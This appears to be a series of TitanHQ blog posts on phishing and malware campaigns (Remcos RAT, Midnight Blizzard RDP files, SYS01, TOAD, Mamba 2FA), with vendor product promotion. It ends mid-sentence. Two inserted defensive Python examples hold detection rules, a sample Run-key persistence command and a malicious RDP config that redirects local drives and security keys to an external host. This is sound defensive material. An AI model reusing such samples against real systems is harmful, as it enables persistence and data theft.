All TitanHQ solutions are easy to use, are available on a free trial, and full\r\nproduct support is provided during that trial.\r\nExcel File Attachments Used in Phishing Campaign to Deliver Fileless Remote\r\nAccess Trojan\r\nby G Hunt | November 15, 2024 | Phishing \u0026 Email Spam\r\nA phishing campaign has been identified that uses purchase order-related lures and Excel file attachments to\r\ndeliver the Remcos RAT, a commercially available malware variant that gives threat actors remote access to an\r\ninfected device. The malware allows the threat actor to log keystrokes, record audio via the microphone, and take\r\nscreenshots and provides a foothold allowing an extensive compromise. Infection with the Remcos RAT\r\ninvariably involves data theft and could lead to a ransomware attack and extortion.\r\nTraditional antivirus software is unlikely to provide protection on its own. In this campaign the Remcos RAT is\r\nloaded directly into memory rather than written to disk, so file-based scanning has little to inspect and detection\r\ndepends on monitoring the behavior of the delivery chain. The campaign, detected by researchers at FortiGuard Labs, targets\r\nWindows users and starts with a phishing email with an encrypted Excel attachment. The emails purport to be a\r\npurchase order and include a malicious Excel file attachment. The Excel file uses OLE objects to exploit an old\r\nvulnerability in Office, tracked as CVE-2017-0199. Successful exploitation of the vulnerability will see an HTML\r\nApplication (HTA) file downloaded, which is launched using mshta.exe. 
The file is heavily obfuscated to evade\r\nsecurity solutions, and its function is to download and execute a binary, which uses process hollowing to\r\ndownload and run the Remcos RAT in memory.\r\nThe Remcos RAT is used to enumerate and terminate processes, execute commands, capture sensitive data, and\r\ndownload additional malware payloads. Since the Remcos RAT runs in memory, it will not survive a reboot.\r\nTo achieve persistence, it runs the registry editor (reg.exe) to edit the Windows Registry to add a new auto-run\r\nitem to ensure it is launched after each reboot.\r\nSince the initial contact is made via email, an advanced email security solution with email sandboxing and AI- and\r\nmachine learning capabilities should ensure the email is identified as malicious and blocked to prevent delivery.\r\nShould the email be delivered and the attachment opened, end users are informed that the document is protected.\r\nThey are presented with a blurred version of the Excel file and are told they need to enable editing to view the\r\ncontent – a red flag that should be identified by security-aware employees. If that red flag is missed, enabling\r\ncontent will trigger the exploitation of the vulnerability that ultimately delivers the Remcos RAT. Businesses with\r\nan advanced DNS-based web filter will have another layer of protection, as the URLs hosting the malicious files\r\nshould be blocked.\r\nTitanHQ offers cutting-edge cybersecurity solutions that provide exceptional protection against phishing, BEC,\r\nand malware attacks, blocking the initial emails and connections to malicious websites to prevent end users from\r\nviewing malicious emails (SpamTitan) and preventing malicious file downloads from the Internet (WebTitan). In\r\nNovember 2024 tests by Virus Bulletin, TitanHQ’s SpamTitan Solution had a 100% phishing and malware block\r\nrate. 
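Because the RAT itself leaves nothing on disk, the detectable part of this chain is the sequence of processes described above: Excel launching mshta.exe, mshta.exe launching a downloaded binary, and reg.exe adding an auto-run value. The detection logic below is an added example, not from the original post or from FortiGuard's report. It applies three rules to process-creation events in the shape Sysmon Event ID 1 produces (Image, ParentImage, CommandLine, ProcessId, ParentProcessId) and walks the parent chain so that a Run-key write descended from an Office application is reported as persistence rather than as an ordinary admin action. The events, paths, and file names are constructed to mimic the chain.

```python
"""Detection logic for the Excel -> mshta.exe -> Run-key chain.

Added example; not from the original post or FortiGuard's report. Rules run
over process-creation events shaped like Sysmon Event ID 1. All events, paths
and file names below are constructed for illustration.
"""
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\b", re.I)


def _exe(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(event: dict, by_pid: dict) -> list:
    """Parent chain of an event, nearest first; stops at unknown PIDs or loops."""
    chain = []
    cur = by_pid.get(event["ParentProcessId"])
    while cur is not None and cur not in chain:
        chain.append(cur)
        cur = by_pid.get(cur["ParentProcessId"])
    return chain


def detect(events: list) -> list:
    """Return (rule, ProcessId, summary) alerts for the events given."""
    alerts = []
    by_pid = {e["ProcessId"]: e for e in events}
    for e in events:
        img, parent = _exe(e["Image"]), _exe(e["ParentImage"])
        cmd = e.get("CommandLine", "")
        # Rule 1: an Office application launching mshta.exe is how a
        # CVE-2017-0199-style OLE payload runs its HTA.
        if img == "mshta.exe" and parent in OFFICE_APPS:
            alerts.append(("office_spawns_mshta", e["ProcessId"],
                           f"{parent} launched mshta.exe: {cmd}"))
        # Rule 2: mshta.exe should not normally spawn further executables.
        if parent == "mshta.exe" and img != "mshta.exe":
            alerts.append(("mshta_spawns_process", e["ProcessId"],
                           f"mshta.exe launched {img}: {cmd}"))
        # Rule 3: reg.exe adding a Run/RunOnce value. The ancestry walk
        # separates the persistence step of this chain from admin scripts.
        if img == "reg.exe" and re.search(r"\badd\b", cmd, re.I) and RUN_KEY_RE.search(cmd):
            from_office = any(_exe(a["Image"]) in OFFICE_APPS for a in ancestry(e, by_pid))
            rule = "run_key_persistence" if from_office else "run_key_write_info"
            alerts.append((rule, e["ProcessId"], f"reg.exe wrote an autorun value: {cmd}"))
    return alerts


# Constructed event stream: the malicious chain plus one benign Run-key write.
EVENTS = [
    {"ProcessId": 1200, "ParentProcessId": 900, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 4412, "ParentProcessId": 1200,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"EXCEL.EXE" "C:\Users\a\Downloads\PO-2024-1187.xlsx"'},
    {"ProcessId": 5020, "ParentProcessId": 4412, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'mshta.exe "C:\Users\a\AppData\Local\Temp\inv.hta"'},
    {"ProcessId": 5188, "ParentProcessId": 5020,
     "Image": r"C:\Users\a\AppData\Local\Temp\svchost_upd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"C:\Users\a\AppData\Local\Temp\svchost_upd.exe"},
    {"ProcessId": 5302, "ParentProcessId": 5188, "Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Users\a\AppData\Local\Temp\svchost_upd.exe",
     "CommandLine": r'reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
                    r' /v Updater /t REG_SZ /d "C:\Users\a\AppData\Local\Temp\svchost_upd.exe" /f'},
    {"ProcessId": 6100, "ParentProcessId": 900, "Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
                    r' /v Agent /d "C:\Program Files\Agent\agent.exe" /f'},
]

if __name__ == "__main__":
    for rule, pid, summary in detect(EVENTS):
        print(f"[{rule}] pid={pid}: {summary}")
```

Rule 1 alone catches this campaign at the point where nothing malicious has yet touched disk beyond the HTA, which is why it is worth alerting on even when the later stages are missed. The benign logon-script write at the end is reported at informational level only, so the rule can run noisily on a fleet without drowning the persistence alert in routine admin activity.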
TitanHQ also provides a comprehensive security awareness training platform (SafeTitan) to teach\r\ncybersecurity best practices and keep employees aware of the latest threats. The platform also incorporates a\r\nphishing simulator for reinforcing training. Give the TitanHQ team a call today for more information on TitanHQ\r\nsolutions and how they can improve your defenses against email, web, SMS, and voice-based threats at your\r\nbusiness.\r\nA Russian APT Group is Conducting a Massive Spear Phishing Campaign\r\nby G Hunt | October 31, 2024 | Phishing \u0026 Email Spam\r\nThe notorious Russian advanced persistent threat (APT) group Midnight Blizzard (aka Cozy Bear, APT29) has\r\nbeen conducting a massive spear phishing campaign on targets in the United Kingdom, Europe, Australia, and\r\nJapan. Midnight Blizzard is a hacking group with strong links to Russia’s Foreign Intelligence Service (SVR)\r\nwhich engages in espionage of foreign interests and seeks persistent access to accounts and devices to steal\r\ninformation of interest to the SVR. The latest campaign is a highly targeted information-gathering exercise that\r\nwas first observed on October 22, 2024.\r\nWhile Midnight Blizzard’s spear phishing attacks are usually conducted on government officials and individuals\r\nin non-governmental organizations (NGOs), individuals in academia and other sectors have also been\r\ntargeted. The spear phishing attacks were identified by Microsoft Threat Intelligence which reports that thousands\r\nof emails have been sent to more than 100 organizations and the campaign is ongoing. 
While spear phishing is\r\nnothing new, Midnight Blizzard has adopted a new tactic in these attacks and is sending a signed Remote Desktop\r\nProtocol (RDP) configuration file as an email attachment, with a variety of lures tailored to the individual being\r\ntargeted. Some of the intercepted emails impersonated Microsoft, others impersonated cloud service providers,\r\nand several of the emails used lures related to zero trust. The email addresses used in this campaign have been\r\npreviously compromised in other Midnight Blizzard campaigns.\r\nAmazon has also reported that it detected phishing emails that impersonated Amazon Web Services (AWS),\r\nattempting to trick the recipients into thinking AWS domains were used; however, the campaign did not seek AWS\r\ncredentials, as Midnight Blizzard is targeting Windows credentials. Amazon immediately started the process of\r\nseizing the domains used by Midnight Blizzard to impersonate AWS and that process is ongoing.\r\nAn RDP (.rdp) file is a plain-text connection-settings file read by the Remote Desktop Connection client\r\n(mstsc.exe). It specifies the server to connect to and which local resources, such as drives, the clipboard, printers\r\nand smart cards, are redirected to that server for the session. The attached RDP files are signed with a Let’s Encrypt certificate and extend features and\r\nresources of the local system to a remote server under the attacker’s control. If the RDP file is executed, a\r\nconnection is made to a server under the control of Midnight Blizzard, and the targeted user’s local device’s\r\nresources are bidirectionally mapped to the server.\r\nThe server is sent resources including logical hard disks, clipboard contents, printers, connected devices,\r\nauthentication features, and Windows operating system facilities. 
The connection allows the attacker to install\r\nmalware, which is set to execute via AutoStart folders, steal credentials, and download other tools to the user’s\r\ndevice, including remote access trojans to ensure that access to the targeted system is maintained when the RDP\r\nsession is closed.\r\nSince the emails were sent using email addresses at legitimate organizations, they are unlikely to be flagged as\r\nmalicious based on reputation checks by anti-spam software, although they may be detected by more advanced anti-spam services that incorporate machine learning and AI-based detection mechanisms and email sandboxing. You\r\nshould configure your spam filter to block emails containing RDP files and other executable files and\r\nconfigure your firewall to block outbound RDP connection attempts to external or public networks. Multifactor\r\nauthentication should be configured on all accounts to prevent compromised credentials from granting access, and\r\nconsider using your endpoint security software to block executable files from running if they are not on\r\na trusted list. Also, ensure that downloaded files are scanned using antivirus software. A web filter can provide\r\nadded protection against malicious file downloads from the internet.\r\nAn anti-phishing solution should also be considered for augmenting the protection provided through Microsoft\r\nDefender and EOP for Microsoft 365. PhishTitan from TitanHQ has been shown to improve protection and block\r\nthreats that Microsoft’s anti-phishing solution fails to detect, augmenting rather than replacing the protection\r\nprovided by EOP and Defender. It is also important to provide security awareness training to the workforce and\r\nensure that spear phishing and RDP file attachments are included in the training. 
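Blocking .rdp attachments outright, as recommended above, is the right default; where a mail or endpoint team still needs to triage the files that do arrive (for example from quarantine), the checker below is an added example, not from Microsoft's or Amazon's reporting, that reads the settings an .rdp file carries and reports what it would hand to the remote server. An .rdp file is plain text with one name:type:value setting per line (type s for string, i for integer), which is what mstsc.exe parses. The checker flags a connection target outside an allow-list, every local-resource redirection that is switched on, RemoteApp mode, suppressed certificate warnings, and the presence of a signature, which proves only who produced the file and not that the host is safe. Both sample files and all host names are constructed.

```python
"""Triage of .rdp attachments for the resource-redirection settings this
campaign relies on. Added example; not from Microsoft's or Amazon's
reporting. Both sample files and every host name below are constructed.
"""

# Setting name -> the local resource that setting hands to the remote server.
REDIRECT_KEYS = {
    "drivestoredirect": "local drives",
    "redirectclipboard": "clipboard",
    "redirectprinters": "printers",
    "redirectsmartcards": "smart cards",
    "redirectcomports": "COM ports",
    "devicestoredirect": "plug-and-play devices",
    "usbdevicestoredirect": "USB devices",
    "redirectwebauthn": "WebAuthn security keys",
}


def parse_rdp(text: str) -> dict:
    """Map setting name -> value. Lines that are not name:type:value are skipped."""
    settings = {}
    for raw in text.splitlines():
        parts = raw.strip().split(":", 2)
        if len(parts) != 3 or parts[1] not in ("s", "i", "b"):
            continue
        settings[parts[0].strip().lower()] = parts[2].strip()
    return settings


def assess_rdp(text: str, trusted_hosts: set) -> list:
    """Return findings; an empty list means an ordinary internal session."""
    s = parse_rdp(text)
    findings = []
    host = s.get("full address", "").rsplit(":", 1)[0].lower()  # strip :port
    if not host:
        findings.append("no 'full address' (connection target unknown)")
    elif host not in trusted_hosts:
        findings.append(f"connects to a host outside the allow-list: {host}")
    for key, what in REDIRECT_KEYS.items():
        value = s.get(key)
        if value not in (None, "", "0"):   # "" and 0 mean redirection is off
            findings.append(f"redirects {what} to the remote server ({key}:{value})")
    if s.get("remoteapplicationmode") == "1":
        findings.append("RemoteApp mode: remote program shown in a local-looking window")
    if s.get("authentication level") == "0":
        findings.append("server certificate warnings suppressed (authentication level:i:0)")
    if "signature" in s:
        findings.append("file carries a signature; that proves who produced it, not that the host is safe")
    return findings


# Constructed file in the shape the campaign uses: external host, everything redirected.
MALICIOUS_RDP = """\
screen mode id:i:2
full address:s:gateway.example-cloud.invalid
remoteapplicationmode:i:1
remoteapplicationname:s:Device Compliance Check
drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:1
redirectsmartcards:i:1
redirectwebauthn:i:1
devicestoredirect:s:*
authentication level:i:0
signscope:s:Full Address,Drives To Redirect
signature:s:AQABAAEAAAA=
"""

# Constructed file for a normal session to an internal jump host.
CORP_RDP = """\
full address:s:rdp.corp.example.invalid:3389
drivestoredirect:s:
redirectclipboard:i:0
redirectprinters:i:0
authentication level:i:2
"""

if __name__ == "__main__":
    trusted = {"rdp.corp.example.invalid"}
    for label, sample in (("malicious", MALICIOUS_RDP), ("corporate", CORP_RDP)):
        print(label, assess_rdp(sample, trusted) or ["no findings"])
```

The same parse can feed a mail-flow rule: quarantine any .rdp whose full address is not on the allow-list or that turns on drive, smart-card, or WebAuthn redirection, since a legitimate internal session rarely needs a user's security key forwarded to the far end. The allow-list is the part a practitioner must fill in from their own environment; nothing in the file itself marks a host as trustworthy.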
Also, consider conducting spear\r\nphishing simulations.\r\nMalvertising Campaign Uses Facebook Ads to Deliver SYS01 Information Stealer\r\nby G Hunt | October 30, 2024 | Internet Security\r\nA new malvertising campaign has been identified that abuses the Meta advertising platform to deliver an\r\ninformation stealer malware variant called SYS01 Stealer. Similar to other malvertising campaigns, popular\r\nbrands are impersonated to trick users into downloading the information stealer in the belief they are installing\r\nlegitimate software. In this campaign, the impersonated brands include popular software tools that are commonly\r\nused by businesses, including the video and imaging editing tools CapCut, Adobe Photoshop, and Canva, as well\r\nas productivity tools such as Office 365, instant messaging platforms such as Telegram, VPN providers such as\r\nExpress VPN, and a host of other software products and services to ensure a wide reach, including video games\r\nand streaming services.\r\nThe adverts claim that this software and these games and services are available free of charge, which is a red flag\r\nas the genuine products and services usually require a purchase or subscription. The advertisements are published\r\nvia hijacked Facebook business accounts, which according to an analysis by Bitdefender, have been used to create\r\nthousands of ads on the platform, many of which remain active for months. If a user interacts with one of the\r\nadverts, they are directed to sites hosted on Google Sites or True Hosting. Those sites impersonate trusted brands\r\nand offer the application indicated in the initial ad. 
If the user is tricked and progresses to a download, a zip file is\r\ndelivered that contains an executable file that sideloads a malicious DLL, which launches the infection process.\r\nThe DLL runs PowerShell commands that check for sandboxes and abort if one is detected, prepare the\r\nenvironment for the malware to be installed, attempt to disable security solutions so the malware is not detected,\r\nand establish persistence through scheduled tasks. Some identified samples\r\ninclude an Electron application with JavaScript code embedded that drops and executes the malware.\r\nThe cybercriminals behind the campaign respond to detections of the malware by security solutions and change\r\nthe code when the malware starts to be blocked, with the new variant rapidly pushed out via Facebook ads. The\r\ninformation stealer primarily targets Facebook business accounts and steals credentials allowing those accounts to\r\nbe hijacked. Personal data is stolen, and the accounts are used to launch more malicious ads. Since legitimate\r\nFacebook business accounts are used, the attackers can launch malicious ads at scale without arousing\r\nsuspicion. This malvertising campaign stands out due to its scale, with around 100 malicious domains currently\r\nused for malware distribution and command and control operations.\r\nBusinesses should take steps to ensure they are protected by using a web filter to block the malicious domains\r\nused to distribute the malware, to block the Facebook site for employees who do not need it, and to prevent malware downloads from the\r\nInternet. Since business Facebook accounts are targeted, it is important to ensure that 2-factor authentication is\r\nenabled in the event of credentials being compromised and business Facebook accounts should be monitored for\r\nunauthorized access. 
Business users should not install any software unless it comes from an official source, which\r\nshould be reinforced through security awareness training.\r\nTitanHQ has developed an easy-to-use web filter called WebTitan that is constantly updated with threat\r\nintelligence to block access to malicious sites as soon as they are discovered. WebTitan can be configured to block\r\ncertain file downloads from the Internet by extension to reduce the risk of malware infections and control shadow\r\nIT, and WebTitan makes it easy for businesses to enhance productivity while improving security by blocking\r\naccess to known distractions such as social media platforms and video streaming sites. WebTitan provides real-time protection against clicks in phishing emails by preventing a click from launching a malicious website and the\r\nsolution can be used to protect all users on the network as well as off-network users on portable devices through\r\nthe WebTitan on-the-go roaming agent. For more information about improving your defenses against malware\r\ndelivered via the internet and malvertising campaigns, give the TitanHQ team a call today.\r\nTitanHQ Launches Security Awareness Training for MSPs\r\nby G Hunt | October 26, 2024 | Security Awareness\r\nManaged service providers can implement security solutions to protect their clients from phishing, social\r\nengineering, and business email compromise attacks but if a malicious email manages to bypass those defenses, it\r\ncould easily result in hackers gaining a foothold in the network, resulting in a highly disruptive and costly\r\ncyberattack and data breach. 
To improve defenses against phishing, managed service providers should offer their\r\nclients security awareness training to manage human risk, and now TitanHQ can offer a security awareness\r\ntraining (SAT) solution that allows them to do that with ease.\r\nThis month, TitanHQ launched its Security Awareness Training (SAT) solution for MSPs. The solution has been\r\nspecifically created to be used by MSPs and allows them to provide affordable, scalable training with minimal\r\nsetup. The training platform has now been integrated with TitanHQ’s MSP cybersecurity platform and is ready for\r\nMSPs to use. In contrast to many SAT solutions that only provide standard cybersecurity training, TitanHQ’s SAT\r\nsolution integrates advanced phishing simulation with behavior-focused training that is fun and engaging for\r\nparticipants. The solution delivers maximum value to MSPs and can be rapidly set up, allowing them to roll out\r\ntraining programs to new clients with just a few clicks. There is no need to spend hours assigning training content\r\nto new customers, as it is possible to select multiple customers and rapidly spin up training courses that can be\r\nrapidly deployed for individuals or groups of customers in the future.\r\nThe AI-driven training platform allows training content to be tailored to individual employees to meet their\r\ntraining needs, personalizing the training experience. The platform includes more than 80 videos, training\r\nsessions, and webinars to improve awareness and help create a security culture. 
MSPs are provided with monthly\r\nreports on the progress that is being made by individual employees and they are provided with actionable insights.\r\nThe platform includes a phishing simulator that allows MSPs to conduct real-time phishing simulations based on a\r\nhuge variety of templates (1,800+) covering all types of phishing and other attack scenarios, and the content is\r\nupdated regularly to include the latest tactics, techniques, and procedures used by cybercriminals in real-world\r\nphishing campaigns. MSPs can easily pre-configure phishing simulations and training campaigns to roll out to\r\nnew clients as they are onboarded, and the MSP dashboard provides a view of quick actions and live analytics all\r\nin one place.\r\nThe training platform can deliver reactive training in response to user behavior, where users in need of training are\r\nautomatically enrolled and delivered relevant training content. MSPs can use the platform to conduct cyber\r\nawareness knowledge checks to identify areas where individuals need training, verify understanding of the\r\ntraining material, and retest employees over time to ensure they have not forgotten the material from previous\r\ntraining sessions. The training material covers the cyber threats that employees are likely to encounter such as\r\nphishing, social engineering, business email compromise, and malware, but also in-person threats such as physical\r\nsecurity, ensuring they receive comprehensive training that covers all the bases.\r\nIf you have yet to start offering security awareness training to your clients, or if you already offer training but\r\nrequire a more comprehensive and easier-to-use training platform, give the TitanHQ team a call. 
Product\r\ndemonstrations can be arranged on request to show you just how easy the platform is to use.\r\n“Our integrated cybersecurity platform delivers maximum value to MSPs, offering a quicker time-to-market,\r\nreduced set-up requirements combined with real-world, practical security awareness training \u0026 phishing\r\nsimulations. TitanHQ delivers that seamlessly, allowing MSPs to offer comprehensive SAT to their customers in\r\njust a few clicks,” said TitanHQ CEO, Ronan Kavanagh.\r\nMultiple Accounts Compromised in Targeted Phishing Campaigns\r\nby G Hunt | October 26, 2024 | Phishing \u0026 Email Spam\r\nThe purpose of phishing attacks is usually to steal credentials to gain unauthorized access to accounts. If an\r\nemployee falls for a phishing attack and their credentials are obtained, the attacker can gain access to that user’s\r\naccount and any data contained therein. That access can be all that is required for the threat actor to achieve a\r\nmuch more extensive compromise.\r\nOftentimes, a threat actor conducts a more extensive phishing campaign on multiple employees at the same\r\norganization. These phishing attacks can be harder to spot as they have been tailored to that specific organization.\r\nThese attacks usually spoof an internal department with the emails seemingly sent from a legitimate internal email\r\naccount. The emails may address each individual by name, or appear to be broadcast messages to staff\r\nmembers. One successful campaign was identified by the Office of Information Technology at Boise State\r\nUniversity, although not before several employees responded to the emails and disclosed their credentials. In this\r\ncampaign, the emails were addressed to “Dear Staff,” and appeared to have been sent from the postmaster account\r\nby “Health Services,” purporting to be an update on workplace safety. 
The emails had the subject line “Workplace\r\nSafety: Updates on Recent Health Developments,” with a similar campaign indicating a campylobacter infection\r\nhad been reported to the health department.\r\nIn the message, recipients were advised about a health matter involving a member of staff, advising them to\r\ncontact the Health Service department if they believed they had any contact with the unnamed worker. To\r\nfind out whether they had had any contact with the worker, recipients had to click the link. The link directed the user to a fraudulent\r\nlogin page on an external website, where they were required to enter their credentials. The login page had been\r\ncreated to look like a legitimate Boise State University page; it captured the entered credentials and then used a Duo Security\r\nnotification to get the victim to authorize access to their account.\r\nThese targeted campaigns are now common, especially at large organizations where it is possible to compromise a\r\nsignificant number of accounts, making it worth the attacker’s time to develop a targeted campaign. Another attack\r\nwas recently identified by the state of Massachusetts. The attacker created a fake website closely resembling the\r\nHR/CMS Employee Self-Service Time and Attendance (SSTA) system, which is used for payroll. Employees were\r\ntricked into visiting the portal and were prompted to enter their credentials, which the attacker used to access their\r\npersonal and direct deposit information. In this case, the aim of the attack appeared to be to change direct deposit\r\ninformation to have the employees’ wages paid into the attacker’s account. 
Several employees were fooled by the\r\nscam, although in this case the attack was detected promptly and the SSTA system was disabled to prevent\r\nfraudulent transfers.\r\nA different type of campaign recently targeted multiple employees via email, although the aim of the attack was to\r\ngrant the threat actor access to the user’s device by convincing them to install the legitimate remote access\r\nsolution, AnyDesk. The threat actor, the Black Basta ransomware group, had obtained employee email addresses\r\nand bombarded them with spam emails, having signed them up for newsletters via multiple websites. The aim was\r\nto create a legitimate reason for the next phase of the attack, which occurred via the telephone, although the group\r\nhas also been observed using Microsoft Teams to make contact. The threat actor posed as the company’s IT help\r\ndesk and offered assistance resolving the spam problem they had created, which involved downloading AnyDesk and\r\ngranting access to the device. During the session, tools were installed to provide persistent access. The threat actor\r\nthen moved laterally within the network and deployed ransomware extensively.\r\nThese attacks use social engineering to exploit human weaknesses. In each of these attacks, multiple red flags\r\nshould have been spotted revealing these social engineering attempts for what they were, but more than one\r\nemployee failed to spot them. It is important to provide security awareness training to the workforce to raise\r\nawareness of phishing and social engineering threats, and for training to be provided regularly. 
Training should\r\ninclude the latest tactics used by threat actors to breach networks, including phishing attacks, fake tech support\r\ncalls, malicious websites, smishing, and vishing attacks.\r\nA phishing simulator should be used to send realistic but fake phishing emails internally to identify employees\r\nwho fail to spot the red flags. They can then receive additional training relevant to the simulation they failed. By\r\nproviding regular security awareness training and conducting phishing simulations, employers can develop a\r\nsecurity culture. While it may not be possible to prevent all employees from responding to a threat, the severity of\r\nany compromise can be limited. With TitanHQ’s SafeTitan solution, it is easy to create and automate tailored\r\ntraining courses and phishing simulations that have been shown to be highly effective at reducing susceptibility to\r\nphishing and other threats.\r\nSince threat actors most commonly target employees via email, it is important to have robust email defenses to\r\nprevent the threats from reaching employees. Advanced anti-spam services such as SpamTitan incorporate a wide\r\nrange of threat detection methods to block more threats, including reputation checks, extensive message analysis,\r\nmachine-learning-based detection, antivirus scans, and email sandboxing for malware detection. SpamTitan has\r\nbeen shown to block more than 99.99% of phishing threats and 100% of malware.\r\nTOAD Attacks: New Voice-Based Phishing Techniques Used in Attacks on\r\nBusinesses\r\nby G Hunt | October 24, 2024 | Phishing \u0026 Email Spam\r\nPhishing is one of the most effective methods used by cyber actors to gain initial access to protected networks.\r\nPhishing tactics are evolving and TOAD attacks now pose a significant threat to businesses. 
TOAD stands for\r\nTelephone-Oriented Attack Delivery and is a relatively new and dangerous form of phishing that involves a\r\ntelephone call, although there are often several different elements to a TOAD attack which may include initial\r\ncontact via email, SMS messages, or instant messaging services.\r\nTOAD attacks often start with an information-gathering phase, where the attacker obtains personal information\r\nabout individuals that can then be targeted. That information may only be a mobile phone number or an email\r\naddress, although further information is required to conduct some types of TOAD attacks.\r\nOne of the most common types of TOAD attacks is callback phishing. The attacker impersonates a trusted entity\r\nin an email and makes a seemingly legitimate request to make contact. There is a sense of urgency to get the\r\ntargeted individual to take prompt action. Rather than use a hyperlink in the message to direct the user to a\r\nwebsite, the next phase of the attack takes place over the telephone or a VoIP-based service such as WhatsApp. A\r\nphone number is included that must be called to resolve a problem.\r\nIf the call is made, the threat actor answers and during the call, trust is built with the caller and the threat actor\r\nmakes their request. That could be an instruction to visit a website where sensitive information must be entered or\r\na file must be downloaded. That file download leads to a malware infection.\r\nSeveral TOAD attacks have involved the installation of legitimate remote access software. One campaign\r\ninvolved initial contact via email about an expensive subscription that was about to be renewed, which required a\r\ncall to cancel. 
The threat actor convinces the user to download remote access software, which they are told is\r\nnecessary to prevent the charge from being applied, for example to fully remove the software solution from the user’s\r\ndevice.\r\nThe user is convinced to give the threat actor access to their device through the software and the threat actor keeps\r\nthe person on the line while they install malware or perform other malicious actions, reassuring them if they get\r\nsuspicious. Other scams involve initial contact about a fictitious purchase that has been made, or a bank scam,\r\nwhere an email impersonates a bank and warns the victim that an account has been opened in their name or a large\r\ncharge is pending. These attacks result in the victim providing the threat actor with the information they need to\r\naccess their account.\r\nTOAD attacks often involve the impersonation of a trusted individual, who may be a colleague, client, or even a\r\nfamily member. Since information is gathered before the scam begins, when the call is made, the threat actor can\r\nprovide that information to the victim to convince them that they are who they claim to be. That information may\r\nhave been purchased on the dark web or obtained in a previous data breach. For instance, following a healthcare\r\ndata breach, the healthcare provider may be impersonated, and the attacker can provide medical information in\r\ntheir possession to convince the victim that they work at the hospital.\r\nThe use of AI tools makes these scams even more convincing. Deepfakes are used, where a person’s voice is\r\nmimicked, or video images are manipulated on video conferencing platforms. 
Deepfakes were used in a scam on\r\nan executive in Hong Kong, who was convinced to transfer around £20 million in company funds to the attacker’s\r\naccount, believing they were communicating with a trusted individual via a video conferencing platform.\r\nTOAD attacks may be solely conducted over the phone, where the attacker uses call spoofing to manipulate the\r\ncaller ID to make it appear that the call is coming from a known and previously verified number. Other methods\r\nmay be used to convince the victim that the reason for the call is genuine, such as conducting a denial-of-service\r\nattack to disrupt a service or device to convince the user that there is an urgent IT problem that needs to be\r\nresolved. TOAD attacks are increasing because standard phishing attacks on businesses are becoming harder to\r\npull off due to email security solutions, multifactor authentication, and improved user awareness about scam\r\nmessages.\r\nUnfortunately, there is no single cybersecurity solution or method that can combat these threats. A comprehensive\r\nstrategy is required that combines technical measures, security awareness training and administrative\r\ncontrols. Advanced anti-spam software with machine learning and AI-based detection can identify the emails that\r\nare used for initial contact. These advanced detection capabilities are needed because the initial emails often\r\ncontain no malicious content, other than a phone number. 
SpamTitan, TitanHQ’s cloud-based anti-spam service,\r\ncan detect these initial emails through reputation checks on the sender’s IP address, email account, and domain,\r\nand machine learning is used to analyze the message content, including comparing emails against the typical\r\nmessages received by a business.\r\nWebTitan is a cloud-based DNS filter that is used to control the web content that users can access. WebTitan will\r\nblock access to known malicious sites and can be configured to prevent certain file types from being downloaded\r\nfrom the internet, such as those commonly used to install malware, unauthorized apps, and remote access\r\nsolutions.\r\nRegular security awareness training is a must. All members of the workforce should be provided with regular\r\nsecurity awareness training and TOAD attacks should feature in the training content. SafeTitan, TitanHQ’s\r\nsecurity awareness training platform and phishing simulator, makes it easy for businesses to create and automate\r\ntraining courses for the workforce. Employees should be trained in how to identify a TOAD attack, told not to\r\ntrust caller ID alone, to avoid clicking links in emails and SMS messages, and to be vigilant when receiving or\r\nmaking calls, and to report any suspicious activity and immediately end a call if something does not seem right.\r\nMamba 2FA Phishing Kit Used to Bypass MFA on Microsoft 365 Accounts\r\nby G Hunt | October 20, 2024 | Phishing \u0026 Email Spam\r\nResearchers have identified a new phishing kit that is being used to steal credentials for Microsoft 365 accounts\r\nand gain access to accounts protected by multi-factor authentication (MFA). The phishing kit, called Mamba 2FA\r\nis a cause of concern as it has the potential to be widely adopted given its relatively low price and there are signs it\r\nis proving popular with cybercriminals since its release in late 2023. 
Phishing kits make it easy for low-skilled\r\ncybercriminals to conduct sophisticated attacks as they provide all the tools required to breach accounts. The\r\nMamba 2FA kit includes the necessary infrastructure to conduct phishing campaigns, masks IP addresses to\r\nprevent them from being blocked, and updates the phishing URLs frequently to ensure they remain active and are\r\nnot blocked by security solutions.\r\nThe Mamba 2FA kit includes phishing pages that mimic Microsoft services such as OneDrive and SharePoint, and\r\nthe pages can be customized to create realistic phishing URLs for targeting businesses, including allowing the\r\nbusiness logo and background images to be added to the login page. Since businesses often have MFA enabled,\r\nsimply stealing Microsoft credentials is not sufficient, as the MFA will block any attempt to use the credentials for\r\nunauthorized access. Like several other popular phishing kits, the Mamba 2FA kit supports adversary-in-the-middle (AitM) attacks, incorporating proxy relays to steal one-time passcodes and authentication cookies in real\r\ntime. When credentials are entered into the phishing page, they are relayed to Microsoft’s servers in real time and\r\nMicrosoft’s responses are relayed back to the victim, including MFA prompts, which allows the threat actor to\r\nsteal the session cookie and gain access to the user’s account.\r\nPhishing kits such as Mamba 2FA pose a serious threat to businesses, which should take steps to protect against\r\nattacks. The AitM tactics can defeat less secure forms of MFA that are based on one-time passwords or push approvals, because the proxy simply relays the code or prompt, but they are not\r\neffective against phishing-resistant MFA such as FIDO2/WebAuthn security keys and passkeys: the credential is bound to the legitimate site’s origin, so an assertion produced on the attacker’s lookalike domain is rejected by the real service. Implementing phishing-resistant MFA stops this class of attack.\r\nOther recommended controls include geo-blocking and allowlisting for 